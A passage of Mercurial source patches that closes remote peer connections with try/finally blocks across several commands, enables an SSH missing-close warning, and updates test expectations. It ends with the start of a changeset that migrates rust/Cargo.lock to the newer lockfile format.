scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') - ctx = scmutil.revsingle(repo, rev, None) - - if ctx.rev() is None: - ctx = repo[None] - parents = ctx.parents() - taglist = [] - for p in parents: - taglist.extend(p.tags()) - - dirty = b"" - if ctx.dirty(missing=True, merge=False, branch=False): - dirty = b'+' - fm.data(dirty=dirty) - - hexoutput = [fm.hexfunc(p.node()) for p in parents] - if default or id: - output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] - fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) - - if num: - numoutput = [b"%d" % p.rev() for p in parents] - output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) - - fm.data( - parents=fm.formatlist( - [fm.hexfunc(p.node()) for p in parents], name=b'node' - ) - ) - else: - hexoutput = fm.hexfunc(ctx.node()) - if default or id: - output = [hexoutput] - fm.data(id=hexoutput) - - if num: - output.append(pycompat.bytestr(ctx.rev())) - taglist = ctx.tags() - - if default and not ui.quiet: - b = ctx.branch() - if b != b'default': - output.append(b"(%s)" % b) - - # multiple tags for a single parent separated by '/' - t = b'/'.join(taglist) - if t: - output.append(t) - - # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(ctx.bookmarks()) - if bm: - output.append(bm) - else: - if branch: - output.append(ctx.branch()) - - if tags: - output.extend(taglist) - - if bookmarks: - output.extend(ctx.bookmarks()) - - fm.data(node=ctx.hex()) - fm.data(branch=ctx.branch()) - fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) - fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) - fm.context(ctx=ctx) - - fm.plain(b"%s\n" % b' '.join(output)) - fm.end() + else: + if branch: + output.append(ctx.branch()) + + if tags: + output.extend(taglist) + + if bookmarks: + output.extend(ctx.bookmarks()) + + fm.data(node=ctx.hex()) + fm.data(branch=ctx.branch()) + fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) + fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) + fm.context(ctx=ctx) + + fm.plain(b"%s\n" % b' '.join(output)) + fm.end() + finally: + if peer: + peer.close() @command( @@ -4291,12 +4297,15 @@ ui.expandpath(source), opts.get(b'branch') ) other = hg.peer(repo, opts, source) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - return bookmarks.incoming(ui, repo, other) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.pager(b'incoming') + ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + return bookmarks.incoming(ui, repo, other) + finally: + other.close() repo._subtoppath = ui.expandpath(source) try: @@ -4327,7 +4336,8 @@ Returns 0 on success. """ opts = pycompat.byteskwargs(opts) - hg.peer(ui, opts, ui.expandpath(dest), create=True) + peer = hg.peer(ui, opts, ui.expandpath(dest), create=True) + peer.close() @command( @@ -4963,12 +4973,15 @@ if opts.get(b'bookmarks'): dest = path.pushloc or path.loc other = hg.peer(repo, opts, dest) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - ui.pager(b'outgoing') - return bookmarks.outgoing(ui, repo, other) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.pager(b'outgoing') + return bookmarks.outgoing(ui, repo, other) + finally: + other.close() repo._subtoppath = path.pushloc or path.loc try: @@ -5679,63 +5692,67 @@ revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev')) other = hg.peer(repo, opts, dest) - if revs: - revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] - if not revs: + try: + if revs: + revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] + if not revs: + raise error.InputError( + _(b"specified revisions evaluate to an empty set"), + hint=_(b"use different revision arguments"), + ) + elif path.pushrev: + # It doesn't make any sense to specify ancestor revisions. So limit + # to DAG heads to make discovery simpler. + expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) + revs = scmutil.revrange(repo, [expr]) + revs = [repo[rev].node() for rev in revs] + if not revs: + raise error.InputError( + _(b'default push revset for path evaluates to an empty set') + ) + elif ui.configbool(b'commands', b'push.require-revs'): raise error.InputError( - _(b"specified revisions evaluate to an empty set"), - hint=_(b"use different revision arguments"), + _(b'no revisions specified to push'), + hint=_(b'did you mean "hg push -r ."?'), ) - elif path.pushrev: - # It doesn't make any sense to specify ancestor revisions. So limit - # to DAG heads to make discovery simpler. - expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) - revs = scmutil.revrange(repo, [expr]) - revs = [repo[rev].node() for rev in revs] - if not revs: - raise error.InputError( - _(b'default push revset for path evaluates to an empty set') - ) - elif ui.configbool(b'commands', b'push.require-revs'): - raise error.InputError( - _(b'no revisions specified to push'), - hint=_(b'did you mean "hg push -r ."?'), + + repo._subtoppath = dest + try: + # push subrepos depth-first for coherent ordering + c = repo[b'.'] + subs = c.substate # only repos that are committed + for s in sorted(subs): + result = c.sub(s).push(opts) + if result == 0: + return not result + finally: + del repo._subtoppath + + opargs = dict( + opts.get(b'opargs', {}) + ) # copy opargs since we may mutate it + opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) + + pushop = exchange.push( + repo, + other, + opts.get(b'force'), + revs=revs, + newbranch=opts.get(b'new_branch'), + bookmarks=opts.get(b'bookmark', ()), + publish=opts.get(b'publish'), + opargs=opargs, ) - repo._subtoppath = dest - try: - # push subrepos depth-first for coherent ordering - c = repo[b'.'] - subs = c.substate # only repos that are committed - for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result + result = not pushop.cgresult + + if pushop.bkresult is not None: + if pushop.bkresult == 2: + result = 2 + elif not result and pushop.bkresult: + result = 2 finally: - del repo._subtoppath - - opargs = dict(opts.get(b'opargs', {})) # copy opargs since we may mutate it - opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) - - pushop = exchange.push( - repo, - other, - opts.get(b'force'), - revs=revs, - newbranch=opts.get(b'new_branch'), - bookmarks=opts.get(b'bookmark', ()), - publish=opts.get(b'publish'), - opargs=opargs, - ) - - result = not pushop.cgresult - - if pushop.bkresult is not None: - if pushop.bkresult == 2: - result = 2 - elif not result and pushop.bkresult: - result = 2 - + other.close() return result diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -471,17 +471,20 @@ """lists the capabilities of a remote peer""" opts = pycompat.byteskwargs(opts) peer = hg.peer(ui, opts, path) - caps = peer.capabilities() - ui.writenoi18n(b'Main capabilities:\n') - for c in sorted(caps): - ui.write(b' %s\n' % c) - b2caps = bundle2.bundle2caps(peer) - if b2caps: - ui.writenoi18n(b'Bundle2 capabilities:\n') - for key, values in sorted(pycompat.iteritems(b2caps)): - ui.write(b' %s\n' % key) - for v in values: - ui.write(b' %s\n' % v) + try: + caps = peer.capabilities() + ui.writenoi18n(b'Main capabilities:\n') + for c in sorted(caps): + ui.write(b' %s\n' % c) + b2caps = bundle2.bundle2caps(peer) + if b2caps: + ui.writenoi18n(b'Bundle2 capabilities:\n') + for key, values in sorted(pycompat.iteritems(b2caps)): + ui.write(b' %s\n' % key) + for v in values: + ui.write(b' %s\n' % v) + finally: + peer.close() @command( @@ -2615,12 +2618,17 @@ with ui.configoverride(overrides): peer = hg.peer(ui, {}, path) - local = peer.local() is not None - canpush = peer.canpush() - - ui.write(_(b'url: %s\n') % peer.url()) - ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) - ui.write(_(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no'))) + try: + local = peer.local() is not None + canpush = peer.canpush() + + ui.write(_(b'url: %s\n') % peer.url()) + ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) + ui.write( + _(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no')) + ) + finally: + peer.close() @command( @@ -2723,26 +2731,30 @@ """ target = hg.peer(ui, {}, repopath) - if keyinfo: - key, old, new = keyinfo - with target.commandexecutor() as e: - r = e.callcommand( - b'pushkey', - { - b'namespace': namespace, - b'key': key, - b'old': old, - b'new': new, - }, - ).result() - - ui.status(pycompat.bytestr(r) + b'\n') - return not r - else: - for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): - ui.write( - b"%s\t%s\n" % (stringutil.escapestr(k), stringutil.escapestr(v)) - ) + try: + if keyinfo: + key, old, new = keyinfo + with target.commandexecutor() as e: + r = e.callcommand( + b'pushkey', + { + b'namespace': namespace, + b'key': key, + b'old': old, + b'new': new, + }, + ).result() + + ui.status(pycompat.bytestr(r) + b'\n') + return not r + else: + for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): + ui.write( + b"%s\t%s\n" + % (stringutil.escapestr(k), stringutil.escapestr(v)) + ) + finally: + target.close() @command(b'debugpvec', [], _(b'A B')) @@ -4095,19 +4107,22 @@ def debugwireargs(ui, repopath, *vals, **opts): opts = pycompat.byteskwargs(opts) repo = hg.peer(ui, opts, repopath) - for opt in cmdutil.remoteopts: - del opts[opt[1]] - args = {} - for k, v in pycompat.iteritems(opts): - if v: - args[k] = v - args = pycompat.strkwargs(args) - # run twice to check that we don't mess up the stream for the next command - res1 = repo.debugwireargs(*vals, **args) - res2 = repo.debugwireargs(*vals, **args) - ui.write(b"%s\n" % res1) - if res1 != res2: - ui.warn(b"%s\n" % res2) + try: + for opt in cmdutil.remoteopts: + del opts[opt[1]] + args = {} + for k, v in pycompat.iteritems(opts): + if v: + args[k] = v + args = pycompat.strkwargs(args) + # run twice to check that we don't mess up the stream for the next command + res1 = repo.debugwireargs(*vals, **args) + res2 = repo.debugwireargs(*vals, **args) + ui.write(b"%s\n" % res1) + if res1 != res2: + ui.warn(b"%s\n" % res2) + finally: + repo.close() def _parsewirelangblocks(fh): diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -678,140 +678,148 @@ srcpeer = source.peer() # in case we were called with a localrepo branches = (None, branch or []) origsource = source = srcpeer.url() - revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) + srclock = destlock = cleandir = None + destpeer = None + try: + revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) - if dest is None: - dest = defaultdest(source) - if dest: - ui.status(_(b"destination directory: %s\n") % dest) - else: - dest = ui.expandpath(dest) + if dest is None: + dest = defaultdest(source) + if dest: + ui.status(_(b"destination directory: %s\n") % dest) + else: + dest = ui.expandpath(dest) - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = util.urllocalpath(dest) + source = util.urllocalpath(source) - if not dest: - raise error.InputError(_(b"empty destination path is not valid")) + if not dest: + raise error.InputError(_(b"empty destination path is not valid")) - destvfs = vfsmod.vfs(dest, expandpath=True) - if destvfs.lexists(): - if not destvfs.isdir(): - raise error.InputError(_(b"destination '%s' already exists") % dest) - elif destvfs.listdir(): - raise error.InputError(_(b"destination '%s' is not empty") % dest) + destvfs = vfsmod.vfs(dest, expandpath=True) + if destvfs.lexists(): + if not destvfs.isdir(): + raise error.InputError( + _(b"destination '%s' already exists") % dest + ) + elif destvfs.listdir(): + raise error.InputError( + _(b"destination '%s' is not empty") % dest + ) - createopts = {} - narrow = False - - if storeincludepats is not None: - narrowspec.validatepatterns(storeincludepats) - narrow = True + createopts = {} + narrow = False - if storeexcludepats is not None: - narrowspec.validatepatterns(storeexcludepats) - narrow = True + if storeincludepats is not None: + narrowspec.validatepatterns(storeincludepats) + narrow = True + + if storeexcludepats is not None: + narrowspec.validatepatterns(storeexcludepats) + narrow = True - if narrow: - # Include everything by default if only exclusion patterns defined. - if storeexcludepats and not storeincludepats: - storeincludepats = {b'path:.'} + if narrow: + # Include everything by default if only exclusion patterns defined. + if storeexcludepats and not storeincludepats: + storeincludepats = {b'path:.'} - createopts[b'narrowfiles'] = True + createopts[b'narrowfiles'] = True - if depth: - createopts[b'shallowfilestore'] = True + if depth: + createopts[b'shallowfilestore'] = True - if srcpeer.capable(b'lfs-serve'): - # Repository creation honors the config if it disabled the extension, so - # we can't just announce that lfs will be enabled. This check avoids - # saying that lfs will be enabled, and then saying it's an unknown - # feature. The lfs creation option is set in either case so that a - # requirement is added. If the extension is explicitly disabled but the - # requirement is set, the clone aborts early, before transferring any - # data. - createopts[b'lfs'] = True + if srcpeer.capable(b'lfs-serve'): + # Repository creation honors the config if it disabled the extension, so + # we can't just announce that lfs will be enabled. This check avoids + # saying that lfs will be enabled, and then saying it's an unknown + # feature. The lfs creation option is set in either case so that a + # requirement is added. If the extension is explicitly disabled but the + # requirement is set, the clone aborts early, before transferring any + # data. + createopts[b'lfs'] = True - if extensions.disabled_help(b'lfs'): - ui.status( - _( - b'(remote is using large file support (lfs), but it is ' - b'explicitly disabled in the local configuration)\n' + if extensions.disabled_help(b'lfs'): + ui.status( + _( + b'(remote is using large file support (lfs), but it is ' + b'explicitly disabled in the local configuration)\n' + ) ) - ) - else: - ui.status( - _( - b'(remote is using large file support (lfs); lfs will ' - b'be enabled for this repository)\n' + else: + ui.status( + _( + b'(remote is using large file support (lfs); lfs will ' + b'be enabled for this repository)\n' + ) ) - ) - shareopts = shareopts or {} - sharepool = shareopts.get(b'pool') - sharenamemode = shareopts.get(b'mode') - if sharepool and islocal(dest): - sharepath = None - if sharenamemode == b'identity': - # Resolve the name from the initial changeset in the remote - # repository. This returns nullid when the remote is empty. It - # raises RepoLookupError if revision 0 is filtered or otherwise - # not available. If we fail to resolve, sharing is not enabled. - try: - with srcpeer.commandexecutor() as e: - rootnode = e.callcommand( - b'lookup', - { - b'key': b'0', - }, - ).result() + shareopts = shareopts or {} + sharepool = shareopts.get(b'pool') + sharenamemode = shareopts.get(b'mode') + if sharepool and islocal(dest): + sharepath = None + if sharenamemode == b'identity': + # Resolve the name from the initial changeset in the remote + # repository. This returns nullid when the remote is empty. It + # raises RepoLookupError if revision 0 is filtered or otherwise + # not available. If we fail to resolve, sharing is not enabled. + try: + with srcpeer.commandexecutor() as e: + rootnode = e.callcommand( + b'lookup', + { + b'key': b'0', + }, + ).result() - if rootnode != nullid: - sharepath = os.path.join(sharepool, hex(rootnode)) - else: + if rootnode != nullid: + sharepath = os.path.join(sharepool, hex(rootnode)) + else: + ui.status( + _( + b'(not using pooled storage: ' + b'remote appears to be empty)\n' + ) + ) + except error.RepoLookupError: ui.status( _( b'(not using pooled storage: ' - b'remote appears to be empty)\n' + b'unable to resolve identity of remote)\n' ) ) - except error.RepoLookupError: - ui.status( - _( - b'(not using pooled storage: ' - b'unable to resolve identity of remote)\n' - ) + elif sharenamemode == b'remote': + sharepath = os.path.join( + sharepool, hex(hashutil.sha1(source).digest()) + ) + else: + raise error.Abort( + _(b'unknown share naming mode: %s') % sharenamemode ) - elif sharenamemode == b'remote': - sharepath = os.path.join( - sharepool, hex(hashutil.sha1(source).digest()) - ) - else: - raise error.Abort( - _(b'unknown share naming mode: %s') % sharenamemode - ) + + # TODO this is a somewhat arbitrary restriction. + if narrow: + ui.status( + _(b'(pooled storage not supported for narrow clones)\n') + ) + sharepath = None - # TODO this is a somewhat arbitrary restriction. - if narrow: - ui.status(_(b'(pooled storage not supported for narrow clones)\n')) - sharepath = None + if sharepath: + return clonewithshare( + ui, + peeropts, + sharepath, + source, + srcpeer, + dest, + pull=pull, + rev=revs, + update=update, + stream=stream, + ) - if sharepath: - return clonewithshare( - ui, - peeropts, - sharepath, - source, - srcpeer, - dest, - pull=pull, - rev=revs, - update=update, - stream=stream, - ) + srcrepo = srcpeer.local() - srclock = destlock = cleandir = None - srcrepo = srcpeer.local() - try: abspath = origsource if islocal(origsource): abspath = os.path.abspath(util.urllocalpath(origsource)) @@ -1052,6 +1060,8 @@ shutil.rmtree(cleandir, True) if srcpeer is not None: srcpeer.close() + if destpeer and destpeer.local() is None: + destpeer.close() return srcpeer, destpeer @@ -1253,15 +1263,17 @@ """ source, branches = parseurl(ui.expandpath(source), opts.get(b'branch')) other = peer(repo, opts, source) - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) + cleanupfn = other.close + try: + ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) - if revs: - revs = [other.lookup(rev) for rev in revs] - other, chlist, cleanupfn = bundlerepo.getremotechanges( - ui, repo, other, revs, opts[b"bundle"], opts[b"force"] - ) - try: + if revs: + revs = [other.lookup(rev) for rev in revs] + other, chlist, cleanupfn = bundlerepo.getremotechanges( + ui, repo, other, revs, opts[b"bundle"], opts[b"force"] + ) + if not chlist: ui.status(_(b"no changes found\n")) return subreporecurse() @@ -1320,13 +1332,17 @@ revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] other = peer(repo, opts, dest) - outgoing = discovery.findcommonoutgoing( - repo, other, revs, force=opts.get(b'force') - ) - o = outgoing.missing - if not o: - scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) - return o, other + try: + outgoing = discovery.findcommonoutgoing( + repo, other, revs, force=opts.get(b'force') + ) + o = outgoing.missing + if not o: + scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) + return o, other + except: # re-raises + other.close() + raise def outgoing(ui, repo, dest, opts): @@ -1341,27 +1357,30 @@ limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return recurse() + try: + if not o: + cmdutil.outgoinghooks(ui, repo, other, opts, o) + return recurse() - if opts.get(b'newest_first'): - o.reverse() - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - count = 0 - for n in o: - if limit is not None and count >= limit: - break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: - continue - count += 1 - displayer.show(repo[n]) - displayer.close() - cmdutil.outgoinghooks(ui, repo, other, opts, o) - recurse() - return 0 # exit code is zero since we found outgoing changes + if opts.get(b'newest_first'): + o.reverse() + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + count = 0 + for n in o: + if limit is not None and count >= limit: + break + parents = [p for p in repo.changelog.parents(n) if p != nullid] + if opts.get(b'no_merges') and len(parents) == 2: + continue + count += 1 + displayer.show(repo[n]) + displayer.close() + cmdutil.outgoinghooks(ui, repo, other, opts, o) + recurse() + return 0 # exit code is zero since we found outgoing changes + finally: + other.close() def verify(repo, level=None): diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1841,9 +1841,12 @@ if revs: revs = [repo.lookup(rev) for rev in revs] other = hg.peer(repo, {}, dest) - repo.ui.pushbuffer() - outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) - repo.ui.popbuffer() + try: + repo.ui.pushbuffer() + outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) + repo.ui.popbuffer() + finally: + other.close() cl = repo.changelog o = {cl.rev(r) for r in outgoing.missing} return subset & o diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -175,10 +175,7 @@ # to deadlocks due to a peer get gc'ed in a fork # We add our own stack trace, because the stacktrace when called # from __del__ is useless. - if False: # enabled in next commit - ui.develwarn( - b'missing close on SSH connection created at:\n%s' % warn - ) + ui.develwarn(b'missing close on SSH connection created at:\n%s' % warn) def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None): diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -716,13 +716,17 @@ _(b'sharing subrepo %s from %s\n') % (subrelpath(self), srcurl) ) - shared = hg.share( - self._repo._subparent.baseui, - getpeer(), - self._repo.root, - update=False, - bookmarks=False, - ) + peer = getpeer() + try: + shared = hg.share( + self._repo._subparent.baseui, + peer, + self._repo.root, + update=False, + bookmarks=False, + ) + finally: + peer.close() self._repo = shared.local() else: # TODO: find a common place for this and this code in the @@ -743,14 +747,18 @@ _(b'cloning subrepo %s from %s\n') % (subrelpath(self), util.hidepassword(srcurl)) ) - other, cloned = hg.clone( - self._repo._subparent.baseui, - {}, - getpeer(), - self._repo.root, - update=False, - shareopts=shareopts, - ) + peer = getpeer() + try: + other, cloned = hg.clone( + self._repo._subparent.baseui, + {}, + peer, + self._repo.root, + update=False, + shareopts=shareopts, + ) + finally: + peer.close() self._repo = cloned.local() self._initrepo(parentrepo, source, create=True) self._cachestorehash(srcurl) @@ -760,7 +768,11 @@ % (subrelpath(self), util.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) - exchange.pull(self._repo, getpeer()) + peer = getpeer() + try: + exchange.pull(self._repo, peer) + finally: + peer.close() if cleansub: # keep the repo clean after pull self._cachestorehash(srcurl) @@ -845,7 +857,10 @@ % (subrelpath(self), util.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) - res = exchange.push(self._repo, other, force, newbranch=newbranch) + try: + res = exchange.push(self._repo, other, force, newbranch=newbranch) + finally: + other.close() # the repo is now clean self._cachestorehash(dsturl) diff --git a/tests/remotefilelog-getflogheads.py b/tests/remotefilelog-getflogheads.py --- a/tests/remotefilelog-getflogheads.py +++ b/tests/remotefilelog-getflogheads.py @@ -21,7 +21,10 @@ dest = repo.ui.expandpath(b'default') peer = hg.peer(repo, {}, dest) - flogheads = peer.x_rfl_getflogheads(path) + try: + flogheads = peer.x_rfl_getflogheads(path) + finally: + peer.close() if flogheads: for head in flogheads: diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -361,6 +361,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" not allowed on "foo/file.txt" (changeset "ef1ea85a6374") no rollback information available 0:6675d58eff77 @@ -808,7 +809,6 @@ acl: acl.deny.bookmarks not enabled acl: bookmark access granted: "ef1ea85a6374b77d6da9dcda9541f498f2d17df7" on bookmark "moving-bookmark" bundle2-input-bundle: 7 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache invalid branch cache (served.hidden): tip differs added 1 changesets with 1 changes to 1 files @@ -900,6 +900,7 @@ bundle2-input-bundle: 7 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on bookmark "moving-bookmark" (changeset "ef1ea85a6374b77d6da9dcda9541f498f2d17df7") no rollback information available 0:6675d58eff77 @@ -985,7 +986,6 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1073,6 +1073,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "wilma" not allowed on "quux/file.py" (changeset "911600dab2ae") no rollback information available 0:6675d58eff77 @@ -1322,7 +1323,6 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1499,6 +1499,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 @@ -1583,7 +1584,6 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1671,6 +1671,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -382,6 +382,7 @@ devel-peer-request: 16 bytes of commands arguments in headers devel-peer-request: finished in *.???? seconds (200) (glob) received listkey for "phases": 15 bytes + (sent 9 HTTP requests and 3898 bytes; received 920 bytes in responses) $ hg rollback -q $ sed 's/.*] "/"/' < ../access.log diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -462,6 +462,7 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 1 changes to 1 files + (sent 8 HTTP requests and 3526 bytes; received 961 bytes in responses) (?) $ grep 'lfs' .hg/requires $SERVER_REQUIRES .hg/requires:lfs $TESTTMP/server/.hg/requires:lfs # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614675352 -3600 # Tue Mar 02 09:55:52 2021 +0100 # Node ID 46cdd6660503fdf783a44e60186c38c41a2f384e # Parent a4c19a162615afd0dc8ab571be25d3134da7b15d rust: Upgrade Cargo.lock to the newer format As discussed in https://phab.mercurial-scm.org/D10085#153099 See https://github.com/rust-lang/cargo/pull/7070 and https://blog.rust-lang.org/2020/01/30/Rust-1.41.0.html#less-conflict-prone-cargolock-format Differential Revision: https://phab.mercurial-scm.org/D10089 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -4,1081 +4,1079 @@ name = "adler" version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" [[package]] name = "aho-corasick" version = "0.7.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" dependencies = [ - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", + "memchr", ] [[package]] name = "ansi_term" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "atty" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", + "winapi", ] [[package]] name = "autocfg" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" [[package]] name = "bitflags" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" [[package]] name = "bitmaps" version = "2.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" dependencies = [ - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "typenum", ] [[package]] name = "byteorder" version = "1.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" [[package]] name = "bytes-cast" version = "0.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" dependencies = [ - "bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "bytes-cast-derive", ] [[package]] name = "bytes-cast-derive" version = "0.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "cc" version = "1.0.66" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" dependencies = [ - "jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)", + "jobserver", ] [[package]] name = "cfg-if" version = "0.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" [[package]] name = "cfg-if" version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chrono" version = "0.4.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" dependencies = [ - "libc 0.2.81 